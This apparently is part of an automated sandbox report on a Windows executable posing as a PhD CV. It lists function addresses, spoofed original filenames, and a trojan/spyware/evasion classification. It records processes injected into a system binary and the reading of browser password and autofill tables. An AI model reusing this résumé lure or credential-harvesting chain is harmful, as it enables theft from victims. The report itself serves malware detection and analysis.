                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F122452_2_00F12245
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5E3102_2_00F5E310
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0101A5262_2_0101A526
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F504452_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4C6E02_2_00F4C6E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010067572_2_01006757
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F506802_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F746702_2_00F74670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6C6002_2_00F6C600
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F527602_2_00F52760
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5A7602_2_00F5A760
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100A6C02_2_0100A6C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEC89F2_2_00FEC89F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F668822_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F368682_2_00F36868
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100E9A62_2_0100E9A6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF08352_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E8102_2_00F7E810
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A02_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100CA132_2_0100CA13
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4BC02_2_00FC4BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100EA5B2_2_0100EA5B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50B102_2_00F50B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F68CDF2_2_00F68CDF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FFEC4C2_2_00FFEC4C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5AC202_2_00F5AC20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCEC202_2_00FCEC20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40C122_2_00F40C12
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62DB02_2_00F62DB0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100EC602_2_0100EC60
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01006C692_2_01006C69
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50D692_2_00F50D69
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0101ACEB2_2_0101ACEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AD002_2_00F4AD00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F42EE82_2_00F42EE8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0E6D2_2_00FF0E6D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70E502_2_00F70E50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F92E482_2_00F92E48
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100EFBF2_2_0100EFBF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F56FE02_2_00F56FE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01000EAD2_2_01000EAD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5CF002_2_00F5CF00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5B0D02_2_00F5B0D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8508C2_2_00F8508C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6B1E02_2_00F6B1E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9717A2_2_00F9717A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FED1302_2_00FED130
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3F1132_2_00F3F113
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3D2EC2_2_00F3D2EC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100F3302_2_0100F330
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100124C2_2_0100124C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F413802_2_00F41380
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE54902_2_00FE5490
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBD4802_2_00FBD480
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010075C62_2_010075C6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100F5C92_2_0100F5C9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC36EC2_2_00FC36EC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FFD6462_2_00FFD646
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FED62C2_2_00FED62C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100F6F62_2_0100F6F6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F117072_2_00F11707
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC98B22_2_00FC98B2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F598702_2_00F59870
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6B8702_2_00F6B870
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC58702_2_00FC5870
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F538002_2_00F53800
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F199E82_2_00F199E8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F959C02_2_00F959C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100F8722_2_0100F872
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010018DA2_2_010018DA
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100FB2E2_2_0100FB2E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6FAA02_2_00F6FAA0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE1B802_2_00FE1B80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100FA892_2_0100FA89
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8DB192_2_00F8DB19
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD7CE82_2_00FD7CE8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6FCE02_2_00F6FCE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100FD272_2_0100FD27
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01007D4C2_2_01007D4C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE9C982_2_00FE9C98
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F53C602_2_00F53C60
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEFDF42_2_00FEFDF4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F59DD02_2_00F59DD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F51EB22_2_00F51EB2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100FF632_2_0100FF63
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01001FC62_2_01001FC6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCFF402_2_00FCFF40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01009ED22_2_01009ED2
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0348E3104_2_0348E310
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034422454_2_03442245
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0354010E4_2_0354010E
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0352E0764_2_0352E076
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034700A04_2_034700A0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035367574_2_03536757
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0348A7604_2_0348A760
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034827604_2_03482760
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034A46704_2_034A4670
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0349C6004_2_0349C600
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353A6C04_2_0353A6C0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0347C6E04_2_0347C6E0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034806804_2_03480680
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0354A5264_2_0354A526
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034804454_2_03480445
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03480B104_2_03480B10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034F4BC04_2_034F4BC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353EA5B4_2_0353EA5B
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353CA134_2_0353CA13
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0347E9A04_2_0347E9A0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353E9A64_2_0353E9A6
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034668684_2_03466868
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034AE8104_2_034AE810
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035208354_2_03520835
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034968824_2_03496882
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0351C89F4_2_0351C89F
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0348CF004_2_0348CF00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03486FE04_2_03486FE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353EFBF4_2_0353EFBF
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034C2E484_2_034C2E48
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034A0E504_2_034A0E50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03520E6D4_2_03520E6D
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03472EE84_2_03472EE8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03530EAD4_2_03530EAD
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03480D694_2_03480D69
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0347AD004_2_0347AD00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03492DB04_2_03492DB0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0352EC4C4_2_0352EC4C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353EC604_2_0353EC60
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03536C694_2_03536C69
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03470C124_2_03470C12
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0348AC204_2_0348AC20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034FEC204_2_034FEC20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03498CDF4_2_03498CDF
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0354ACEB4_2_0354ACEB
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353F3304_2_0353F330
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034713804_2_03471380
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353124C4_2_0353124C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0346D2EC4_2_0346D2EC
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034C717A4_2_034C717A
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0346F1134_2_0346F113
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0351D1304_2_0351D130
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0348B0D04_2_0348B0D0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B508C4_2_034B508C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0352D6464_2_0352D646
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0351D62C4_2_0351D62C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034F36EC4_2_034F36EC
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353F6F64_2_0353F6F6
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035375C64_2_035375C6
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353F5C94_2_0353F5C9
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035154904_2_03515490
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034ED4804_2_034ED480
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034BDB194_2_034BDB19
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353FB2E4_2_0353FB2E
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03511B804_2_03511B80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353FA894_2_0353FA89
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0349FAA04_2_0349FAA0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034C59C04_2_034C59C0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034499E84_2_034499E8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353F8724_2_0353F872
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034898704_2_03489870
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0349B8704_2_0349B870
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034F58704_2_034F5870
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034838004_2_03483800
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035318DA4_2_035318DA
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034F98B24_2_034F98B2
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034FFF404_2_034FFF40
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353FF634_2_0353FF63
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03531FC64_2_03531FC6
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03539ED24_2_03539ED2
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03481EB24_2_03481EB2
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03537D4C4_2_03537D4C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0353FD274_2_0353FD27
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03489DD04_2_03489DD0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0351FDF44_2_0351FDF4
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03483C604_2_03483C60
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0349FCE04_2_0349FCE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03507CE84_2_03507CE8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03519C984_2_03519C98
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C61E604_2_02C61E60
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C5B0704_2_02C5B070
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C636804_2_02C63680
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6367C4_2_02C6367C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C654404_2_02C65440
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C7B9304_2_02C7B930
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C5CFF04_2_02C5CFF0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C5CDCE4_2_02C5CDCE
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C5CDD04_2_02C5CDD0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379E3734_2_0379E373
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379E2564_2_0379E256
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037A52844_2_037A5284
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379E70C4_2_0379E70C
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379D7D84_2_0379D7D8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034C7BE4 appears 101 times
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034FEF10 appears 105 times
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0346B910 appears 272 times
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034B5050 appears 57 times
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034EE692 appears 86 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: String function: 00F3B910 appears 272 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: String function: 00FCEF10 appears 105 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: String function: 00F85050 appears 58 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: String function: 00FBE692 appears 86 times
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: String function: 00F97BE4 appears 101 times
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276909146.0000000003457000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28281074134.0000000005E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276028801.00000000014FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28281807050.0000000007AF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000000.00000002.28276909146.000000000342A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetbtugc.exej% vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.000000000103D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exeBinary or memory string: OriginalFilenameqesm.exe. vs Maryam Farokhi-PhD- CV-1403.exe
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, FIoRjuCKxkBVHLGxU9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, FIoRjuCKxkBVHLGxU9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Maryam Farokhi-PhD- CV-1403.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\netbtugc.exeFile created: C:\Users\user\AppData\Local\Temp\aU043Z43Jump to behavior
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: netbtugc.exe, 00000004.00000002.33211544402.0000000008033000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30255917594.000000000802B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008094000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Maryam Farokhi-PhD- CV-1403.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"Jump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
